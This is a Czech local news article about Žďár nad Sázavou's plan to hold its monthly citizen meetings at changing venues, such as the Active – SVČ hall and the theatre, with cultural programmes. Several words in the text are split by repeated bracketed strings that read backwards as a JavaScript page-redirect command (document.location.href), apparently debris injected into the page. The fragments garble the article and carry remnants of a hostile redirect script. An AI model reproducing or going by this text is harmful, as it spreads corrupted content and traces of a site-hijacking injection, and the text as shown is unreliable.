Rainbow page separator

Setkání s občany se uskuteční v tanečním sále i v divadle

Pátek, 29. ledna 2016

Náměstí Republiky Žďár nad Sázavou

Žďár nad Sázavou / Tradice setkávání občanů s vedením města v úřadě skončila. Radnice přis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupila ke změně, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tak, že setkání se pokaždé uskuteční někde jinde a doplní jej doprovodný program. První z nich se odehraje v úterý 9. února od 18 hodin v sále Active – SVČ v Horní ulici.
„Připraven bude také kulturní program, kde vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupí děti ze zájmových kroužků, a k dispozici bude i drobné občerstvení,“ vyjádřil se starosta Žďáru nad Sázavou Zdeněk Navrátil s tím, že únorové setkání bude zaměřeno na téma tvorby strategie rozvoje města. Disku[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat by se mělo i o konkrétních návrzích, které by lidé ve městě v rámci jeho budoucího rozvoje přivítali.
Ždárská radnice ve snaze přitáhnout obyvatele k většímu zájmu o veřejné dění hodlá místa setkání s občany i jejich termíny měnit. Nebude se tak už jednat o tradiční první středu v měsíci. Zůstane jenom frekvence setkávání jedenkrát měsíčně, pouze mimo období letních prázdnin. „Chceme se pokusit hledat nové cesty, jak s lidmi komunikovat a snažit se u nich probudit zájem o dění ve městě,“ dodal starosta.
Březnové setkání vedení města s občany se odehraje 2. března v divadle, kde se bude hovořit nejenom o nedávném zateplení budovy a její his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torii. Obyvatelům města se také představí městský architekt a místní ochotníci setkání doprovodí divadelním kusem.